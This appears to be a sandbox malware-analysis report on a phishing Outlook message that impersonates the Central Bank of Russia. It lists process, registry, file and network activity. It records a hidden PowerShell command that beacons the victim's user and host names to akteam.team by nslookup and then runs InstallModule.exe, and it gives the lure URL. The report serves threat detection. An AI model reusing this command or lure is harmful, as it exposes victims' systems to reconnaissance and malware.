| File name: | Важно установка модуля системы конфиденциальной корреспонденции для функционирования электронного обмена сообщениями с Центральным Банком России.msg |
| Full analysis: | https://app.any.run/tasks/a3338126-3bd4-4dcc-ad03-364b2d13545b |
| Verdict: | Malicious activity |
| Analysis date: | September 19, 2023, 13:31:56 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators: | |
| MIME: | application/vnd.ms-outlook |
| File info: | CDFV2 Microsoft Outlook Message |
| MD5: | 250C7F0D2F4A3BFEBC1CB3F7626632B5 |
| SHA1: | C33D6DA1B1A508498333E3CB7298BE80888B680D |
| SHA256: | B56C3A382B755C86ABAAA24F2C161F9261C81328C02C8577F7C0B7EC80E76C7B |
| SSDEEP: | 768:LnvQ7r/SWsKlFWqpcAH/f+gi++4xBkfs0UU2gxQuYcfkHl8veZO3OsymPf5j6WRQ:8T/WqpHHXjZ8fzUeKcfi8mZBp |
| .msg | | | Outlook Message (58.9) |
|---|---|---|
| .oft | | | Outlook Form Template (34.4) |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 124 | "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\29cf8e78-1fd2-4eb0-a1b8-0f90ca83dc49.msg" | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Outlook Exit code: 0 Version: 14.0.6025.1000 Modules
| |||||||||||||||
| 444 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2488 --field-trial-handle=1320,i,8762169259997517144,6837430427134963582,131072 /prefetch:8 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Edge Exit code: 0 Version: 109.0.1518.115 Modules
| |||||||||||||||
| 860 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --single-argument https://ddei5-0-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2fstorage.cbr.team%2fmodule%3fpageid%3ddfV4jKZ%26version%3d115a4&umid=4D650B71-05B5-E706-A43B-F1E3B86B413F&auth=625e2ec5d7ab7fa1a0e15b1adfe319389eb0f9d9-6cc9923337202528fdd4de890a3c1e9bfb16713d | C:\Program Files\Microsoft\Edge\Application\msedge.exe | OUTLOOK.EXE | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Edge Exit code: 0 Version: 109.0.1518.115 Modules
| |||||||||||||||
| 948 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noprofile -w 1 $l=gl;cd $l;nslookup uxeYuxTRMF8pMa.sce1.admin.USER-PC.USER-PC.b.akteam.team; start .\InstallModule.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WinRAR.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1180 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4480 --field-trial-handle=1320,i,8762169259997517144,6837430427134963582,131072 /prefetch:8 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Exit code: 0 Version: 109.0.1518.115 Modules
| |||||||||||||||
| 1444 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3732 --field-trial-handle=1320,i,8762169259997517144,6837430427134963582,131072 /prefetch:8 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Exit code: 0 Version: 109.0.1518.115 Modules
| |||||||||||||||
| 1936 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=renderer --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3896 --field-trial-handle=1320,i,8762169259997517144,6837430427134963582,131072 /prefetch:1 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Exit code: 0 Version: 109.0.1518.115 Modules
| |||||||||||||||
| 1952 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=renderer --first-renderer-process --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2272 --field-trial-handle=1320,i,8762169259997517144,6837430427134963582,131072 /prefetch:1 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Exit code: 0 Version: 109.0.1518.115 Modules
| |||||||||||||||
| 1952 | "C:\Windows\system32\nslookup.exe" uxeYuxTRMF8pMa.sce1.admin.USER-PC.USER-PC.b.akteam.team | C:\Windows\System32\nslookup.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: nslookup Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2272 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1264 --field-trial-handle=1320,i,8762169259997517144,6837430427134963582,131072 /prefetch:2 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Exit code: 0 Version: 109.0.1518.115 Modules
| |||||||||||||||
| (PID) Process: | (124) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (124) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1041 |
Value: On | |||
| (PID) Process: | (124) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1046 |
Value: On | |||
| (PID) Process: | (124) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1036 |
Value: On | |||
| (PID) Process: | (124) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1031 |
Value: On | |||
| (PID) Process: | (124) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1040 |
Value: On | |||
| (PID) Process: | (124) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1049 |
Value: On | |||
| (PID) Process: | (124) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 3082 |
Value: On | |||
| (PID) Process: | (124) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1042 |
Value: On | |||
| (PID) Process: | (124) OUTLOOK.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1055 |
Value: On | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 124 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVR7769.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 124 | OUTLOOK.EXE | C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst | — | |
MD5:— | SHA256:— | |||
| 860 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old~RF10efa1.TMP | — | |
MD5:— | SHA256:— | |||
| 860 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old | — | |
MD5:— | SHA256:— | |||
| 124 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\outlook logging\firstrun.log | text | |
MD5:C555CD7BEA9C0962C835675A7BFEAA0F | SHA256:618C03F4164B66872E95073379D4117D183B4D6660939031C2935CD2693298CE | |||
| 124 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_ConversationPrefs_2_988E3A672B28184AAF17CD1E8C9D0E2E.dat | xml | |
MD5:57F30B1BCA811C2FCB81F4C13F6A927B | SHA256:612BAD93621991CB09C347FF01EC600B46617247D5C041311FF459E247D8C2D3 | |||
| 124 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_AvailabilityOptions_2_D36CA595848CDF4BAB4AA870C36DB1CE.dat | xml | |
MD5:EEAA832C12F20DE6AAAA9C7B77626E72 | SHA256:C4C9A90F2C961D9EE79CF08FBEE647ED7DE0202288E876C7BAAD00F4CA29CA16 | |||
| 124 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\{EFB79282-7807-41DA-B767-EE25EAFAA3F1}\{1C306CB1-771E-4B4B-A902-86E897877F5B}.png | image | |
MD5:4C61C12EDBC453D7AE184976E95258E1 | SHA256:296526F9A716C1AA91BA5D6F69F0EB92FDF79C2CB2CFCF0CEB22B7CCBC27035F | |||
| 860 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old~RF10efb1.TMP | — | |
MD5:— | SHA256:— | |||
| 860 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old | — | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
124 | OUTLOOK.EXE | GET | — | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | unknown | — | — | unknown |
2320 | msedge.exe | GET | 204 | 13.107.6.158:80 | http://edge-http.microsoft.com/captiveportal/generate_204 | unknown | — | — | unknown |
868 | svchost.exe | HEAD | 200 | 178.79.242.0:80 | http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/90e233fa-faa4-4607-8abf-33baa9eb7e2c?P1=1695729565&P2=404&P3=2&P4=HCwJwKKwaEaTgZd9ivatAiDXa3PJoxybJiGZIQ7axJ0oMNfWEDsYTNJlb61V2TQE%2fx0rwg8g9WUfxXE2n%2f8%2bpg%3d%3d | unknown | — | — | unknown |
2320 | msedge.exe | GET | 301 | 172.67.212.6:80 | http://storage.cbr.team/module/?pageid=dfV4jKZ&version=115a4 | unknown | — | — | unknown |
868 | svchost.exe | GET | — | 178.79.242.0:80 | http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/c78f9967-7a8c-44b0-ad94-732b63c89638?P1=1695712230&P2=404&P3=2&P4=j0qJJ%2bEHMnV8FS02WlYpLac7lUu1DQPwWv%2bPgC6Hzd91DATXBKkR3T%2fryklKhoePqO%2fFDauP29kZijUHJZxBKg%3d%3d | unknown | — | — | unknown |
868 | svchost.exe | GET | 206 | 178.79.242.0:80 | http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/90e233fa-faa4-4607-8abf-33baa9eb7e2c?P1=1695729565&P2=404&P3=2&P4=HCwJwKKwaEaTgZd9ivatAiDXa3PJoxybJiGZIQ7axJ0oMNfWEDsYTNJlb61V2TQE%2fx0rwg8g9WUfxXE2n%2f8%2bpg%3d%3d | unknown | binary | 10.9 Kb | unknown |
868 | svchost.exe | GET | 206 | 178.79.242.0:80 | http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/90e233fa-faa4-4607-8abf-33baa9eb7e2c?P1=1695729565&P2=404&P3=2&P4=HCwJwKKwaEaTgZd9ivatAiDXa3PJoxybJiGZIQ7axJ0oMNfWEDsYTNJlb61V2TQE%2fx0rwg8g9WUfxXE2n%2f8%2bpg%3d%3d | unknown | binary | 19.8 Kb | unknown |
868 | svchost.exe | GET | 206 | 178.79.242.0:80 | http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/c78f9967-7a8c-44b0-ad94-732b63c89638?P1=1695712230&P2=404&P3=2&P4=j0qJJ%2bEHMnV8FS02WlYpLac7lUu1DQPwWv%2bPgC6Hzd91DATXBKkR3T%2fryklKhoePqO%2fFDauP29kZijUHJZxBKg%3d%3d | unknown | binary | 165 Kb | unknown |
868 | svchost.exe | GET | 206 | 178.79.242.0:80 | http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/90e233fa-faa4-4607-8abf-33baa9eb7e2c?P1=1695729565&P2=404&P3=2&P4=HCwJwKKwaEaTgZd9ivatAiDXa3PJoxybJiGZIQ7axJ0oMNfWEDsYTNJlb61V2TQE%2fx0rwg8g9WUfxXE2n%2f8%2bpg%3d%3d | unknown | binary | 14.5 Kb | unknown |
868 | svchost.exe | GET | 206 | 178.79.242.0:80 | http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/90e233fa-faa4-4607-8abf-33baa9eb7e2c?P1=1695729565&P2=404&P3=2&P4=HCwJwKKwaEaTgZd9ivatAiDXa3PJoxybJiGZIQ7axJ0oMNfWEDsYTNJlb61V2TQE%2fx0rwg8g9WUfxXE2n%2f8%2bpg%3d%3d | unknown | binary | 6.71 Kb | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
3284 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
1088 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
124 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
2320 | msedge.exe | 54.244.106.60:443 | ddei5-0-ctp.trendmicro.com | AMAZON-02 | US | unknown |
2320 | msedge.exe | 13.107.42.16:443 | config.edge.skype.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
2320 | msedge.exe | 51.104.176.40:443 | nav-edge.smartscreen.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
2320 | msedge.exe | 204.79.197.239:443 | edge.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown |
860 | msedge.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
Domain | IP | Reputation |
|---|---|---|
config.messenger.msn.com |
| whitelisted |
ddei5-0-ctp.trendmicro.com |
| unknown |
config.edge.skype.com |
| whitelisted |
nav-edge.smartscreen.microsoft.com |
| whitelisted |
edge.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
dns.msftncsi.com |
| shared |
edge-http.microsoft.com |
| whitelisted |
msedge.b.tlu.dl.delivery.mp.microsoft.com |
| whitelisted |